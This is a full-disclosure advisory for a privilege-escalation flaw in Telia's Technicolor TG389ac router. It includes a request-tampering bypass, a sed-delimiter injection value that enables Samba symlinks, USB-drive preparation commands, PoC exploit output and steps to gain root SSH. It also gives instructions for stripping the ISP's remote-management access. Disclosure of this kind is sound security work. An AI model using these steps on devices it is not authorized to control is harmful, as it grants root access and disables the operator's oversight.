FDEU-CVE-2020-1FC5
Summary
Improper restricted user's input validation in Telia Technicolor TG389ac router causes local privilege escalation.
Tech details
Telia Lithuania internet provider uses CPE (customer premise equipment) Technicolor router model TG389ac which has a restricted admin user that allows to only change some settings. Most of the advanced settings are locked down and hidden from the customer. The current firmware version is 17.1.7992 and it is known to contain vulnerabilities that allow customers to escalate privileges and unlock full access to all router's features. One of the vulnerable components called "Content sharing" allows customers to plug a USB mass storage device and share its contents using the built-in Samba server. The customer can provide a specially crafted setting using the admin's web UI that enables Samba symlink feature. Such a symlink that points to "/" will expose the router's file system with read-write access.
Vulnerabilities
Improper user input validation
Content sharing web administration looks like this:
When user tries to enter non-alphanumeric symbols, the error comes back:
Only alphanumeric, space, underscore and dash characters allowed
But if the user tries to change the settings without enabling Samba, the settings will get written into the config file:
However, the web UI will not allow to enable the service if the settings contain illegal symbols.
By slightly tampering the web request it is possible to bypass this verification and enable Samba with the provided malicious parameters. To modify the request simply remove the parameter samba_filesharing=1
.
Samba config injection
When Samba service starts it parses the parameters and uses a template file to replace placeholders and generate the runtime config smb.conf. To replace the params the following sed
command is used in /etc/init.d/samba
:
sed -e "s#|NAME|#$name#g" \
-e "s#|WORKGROUP|#$workgroup#g" \
-e "s#|DESCRIPTION|#$description#g" \
-e "s#|INTERFACES|#$interfaces#g" \
-e "s#|CHARSET|#$charset#g" \
/etc/samba/smb.conf.template > /var/etc/smb.conf
The sed -e
command supports multiple rules delimited by ;
. In this case it is possible to modify the rule to look like the following:
"s#|NAME|#Technicolor#g ; s#follow symlinks = no#follow symlinks = yes#g"
To achieve this the $name
variable must look like:
Technicolor#g ; s#follow symlinks = no#follow symlinks = yes
Privilege escalation
To exploit this vulnerability a user would need to create an EXT2 USB flash drive:
mkfs.ext2 /dev/sdX1
mkdir /tmp/sdX1
mount /dev/sdX1 /tmp/sdX1
cd /tmp/sdX1
touch exploit
ln -s / rootfs
cd ~
umount /tmp/sdX1
Plug it into the router's USB port and execute the provided PoC exploit:
https://github.com/full-disclosure/FDEU-CVE-2020-1FC5
# python3 tg389ac_samba_exploit.py http://192.168.1.254 admin
Password:
[*] Init SRP authentication
[*] Get CSRF token
[*] Send authentication challenge
[*] Send authentication response
[*] Renew CSRF token
[*] Submit dummy samba config
[*] Submit samba exploit
[*] Reboot the router
b'{ "success":"true" }'
[*] Done. Wait until the router boots and open the network share
Example: \\192.168.1.254 or smb://192.168.1.254
Samba config will be injected with the following values:
follow symlinks = yes
wide links = yes
security = user
guest account = root
After the router reboots, Samba service will start with symlinks enabled. Navigate to \\192.168.1.254\rootfs
and replace the etc/config/button
file with this one:
https://github.com/full-disclosure/FDEU-CVE-2020-1FC5/blob/master/etc-config-button
Now press the WPS button and in a about 10 seconds try to login on SSH as root:root
. Change password immediately after login.
Removing Telia's backdoor
WARNING. By removing the backdoor you void your warranty and dissapoint Telia
At any time Telia can remotely connect to your router and change any setting, see your traffic, sniff your secrets. We also recommend removing all Telia's backdoors.
Connect on SSH and remove /etc/dropbear/authorized_keys
and /home/engineer/.ssh/authorized_keys
.
Run the following:
uci set cwmpd.cwmpd_config.state=0
uci commit
rm /etc/cwmp*
Remove the following lines from /etc/nginx/nginx.conf
:
listen 8443 ssl;
listen [::]:8443 ssl;
listen 8080 tproxy;
sessioncontrol.setManagerForPort("default", "8443")
sessioncontrol.setManagerForPort("assistance", "443")
Remove all Telia's backdoor rules from /etc/config/firewall
: Allow-8443-VoIP, Allow-8443-WAN, Allow-SSH-VoIP, Allow-SSH-WAN. They look like this:
config rule
option name 'Allow-8443-WAN'
option src 'wan'
option proto 'tcp'
option dest_port '8443'
For more advanced list of what you can do with the unlocked technicolor router, please check these links:
- https://wuseman.github.io/TG799VAC-XTREME-17.2-MINT/
- https://hack-technicolor.readthedocs.io/en/latest/Unlock/
Timeline
- 2020-08-13 - vulnerability found and exploit created
- 2020-08-14 - full disclosure